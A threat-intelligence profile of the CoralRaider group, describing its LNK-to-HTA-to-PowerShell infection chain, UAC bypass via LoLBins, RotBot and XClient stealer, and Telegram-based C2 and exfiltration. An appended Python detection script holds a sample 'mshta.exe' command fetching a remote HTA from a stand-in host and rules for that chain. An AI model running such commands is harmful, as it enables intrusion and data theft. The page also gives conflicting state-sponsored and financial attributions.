
CoralRaider – Threat Actor

April 10, 2024

CoralRaider

Other Names

Unknown

Location

Vietnam

Date of initial activity

2023

Suspected attribution

State-sponsored threat group

Associated Groups

Unknown

Motivation

Data theft and hijacking social media accounts for financial gains

Associated tools

CoralRaider employs a variety of customized commodity malware families such as RotBot (QuasarRAT), XClient stealer, NetSupport RAT, AsyncRAT and Rhadamanthys.

Active

Yes

Overview

Cisco Talos recently uncovered a new threat actor known as “CoralRaider,” suspected to originate from Vietnam and motivated by financial gain. Operating since at least 2023, CoralRaider has targeted victims across various Asian and Southeast Asian countries. Their primary objective is to steal credentials, financial data, and social media accounts, including those associated with business and advertising.

In their campaigns, CoralRaider utilizes advanced tools such as RotBot, a customized variant of QuasarRAT, and the XClient stealer. Notably, they employ the dead drop technique, utilizing a legitimate service to host the command-and-control (C2) configuration file. Additionally, CoralRaider incorporates uncommon living-off-the-land binaries (LoLBins) like Windows Forfiles.exe and FoDHelper.exe into their operations, highlighting the group’s sophisticated and evolving cyber strategies.

Common targets

India, China, South Korea, Bangladesh, Pakistan, Indonesia, Vietnam.

Attack Vectors

The initial vector of the campaign is the Windows shortcut file. Researchers are unclear on the technique the actor used to deliver the LNKs to the victims.

How they operate

The attack commences when a user opens a malicious Windows shortcut (LNK) file, which triggers the download and execution of an HTML Application (HTA) file from a server controlled by the attacker. The HTA file contains an embedded, obfuscated Visual Basic script, which in turn executes an embedded PowerShell script in memory. After decryption, this PowerShell script sequentially executes three further PowerShell scripts. These scripts perform anti-VM and anti-analysis checks, bypass User Account Control (UAC), disable notifications from Windows and applications on the victim’s machine, and finally download and execute RotBot.

On its first execution, RotBot, a variant of the QuasarRAT client, runs evasion checks to avoid detection on the victim’s machine and performs system reconnaissance. It then connects to a host on a legitimate domain, likely controlled by the threat actor, to retrieve the configuration file needed to reach the command-and-control (C2) server (the dead drop technique noted in the overview). In this campaign, CoralRaider uses a Telegram bot as the C2 channel.

Once connected to the Telegram C2, RotBot loads the XClient stealer payload into the victim’s memory from its resources and executes its plugin program. The XClient stealer plugin performs further anti-VM and anti-virus software checks on the victim’s system. It then gathers browser data such as cookies, stored credentials, and financial details like credit card information, harvests data from social media platforms including Facebook, Instagram, TikTok business ads, and YouTube, and collects application data from Telegram Desktop and Discord on the victim’s machine. Screenshots of the victim’s desktop are captured and saved as PNG files in the temporary folder of the victim’s machine.

Finally, the stealer plugin compiles the collected browser and social media data into a text file, creates a ZIP archive, and exfiltrates both the PNG and ZIP files to the attacker’s Telegram bot C2.
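The process chain above (shortcut to HTA to in-memory PowerShell to the FoDHelper.exe/Forfiles.exe LoLBins, then a Telegram bot as C2) can be turned into simple parent-child detection logic. The code below is an added illustration, not Cisco Talos's or CyberMaterial's code; the event records, pids, the hypothetical `RotBot.exe` image name and the `example.invalid` host are all constructed, and the field names (`pid`, `ppid`, `image`, `cmd`, `dest`) are an assumed simplification of EDR or Sysmon process-creation and network telemetry.

```python
# Constructed process-creation events modelled on the chain LNK -> HTA -> PowerShell -> LoLBins.
PROC_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",   "cmd": "explorer.exe"},
    {"pid": 101, "ppid": 100, "image": "mshta.exe",      "cmd": "mshta.exe http://example.invalid/a.hta"},
    {"pid": 102, "ppid": 101, "image": "powershell.exe", "cmd": "powershell.exe -w hidden"},
    {"pid": 103, "ppid": 102, "image": "fodhelper.exe",  "cmd": "fodhelper.exe"},
    {"pid": 104, "ppid": 102, "image": "forfiles.exe",   "cmd": "forfiles.exe"},
    {"pid": 105, "ppid": 102, "image": "RotBot.exe",     "cmd": "RotBot.exe"},  # hypothetical name
    {"pid": 200, "ppid": 100, "image": "chrome.exe",     "cmd": "chrome.exe"},
]
# Constructed network events: api.telegram.org is the Telegram bot API host used as C2 in the profile.
NET_EVENTS = [
    {"pid": 105, "dest": "api.telegram.org"},
    {"pid": 200, "dest": "api.telegram.org"},  # a browser reaching Telegram is treated as benign
]
LOLBINS = {"fodhelper.exe", "forfiles.exe"}          # the uncommon LoLBins the profile names
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe"}

def ancestry(events, pid):
    """Return lower-cased image names from pid up to the root, nearest first."""
    by_pid = {e["pid"]: e for e in events}
    chain, cur = [], by_pid.get(pid)
    while cur is not None:
        chain.append(cur["image"].lower())
        cur = by_pid.get(cur["ppid"])
    return chain

def detect(proc_events, net_events):
    """Return one alert string per event that matches a stage of the described chain."""
    alerts = []
    for e in proc_events:
        img, parents = e["image"].lower(), ancestry(proc_events, e["ppid"])
        if img == "mshta.exe" and "http" in e["cmd"].lower():
            alerts.append(f"pid {e['pid']}: mshta.exe launching a remote HTA")
        elif img == "powershell.exe" and parents[:1] == ["mshta.exe"]:
            alerts.append(f"pid {e['pid']}: PowerShell spawned by mshta.exe (HTA to in-memory script)")
        elif img in LOLBINS and "powershell.exe" in parents:
            alerts.append(f"pid {e['pid']}: uncommon LoLBin {img} under PowerShell")
    for n in net_events:
        chain = ancestry(proc_events, n["pid"])
        if n["dest"] == "api.telegram.org" and chain and chain[0] not in BROWSERS:
            alerts.append(f"pid {n['pid']}: non-browser {chain[0]} contacting the Telegram bot API")
    return alerts

if __name__ == "__main__":
    for line in detect(PROC_EVENTS, NET_EVENTS):
        print(line)
```

The Telegram rule is the noisiest in practice: legitimate Telegram Desktop clients also reach api.telegram.org, so a real deployment would extend the allow-list rather than alert on every non-browser image.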

Significant Attacks

CoralRaider is of Vietnamese origin and financially motivated. CoralRaider has been operating since at least 2023, targeting victims in several Asian and Southeast Asian countries. (April 2024)

References:
  • CoralRaider targets victims’ data and social media accounts.
  • CoralRaider targets social media accounts.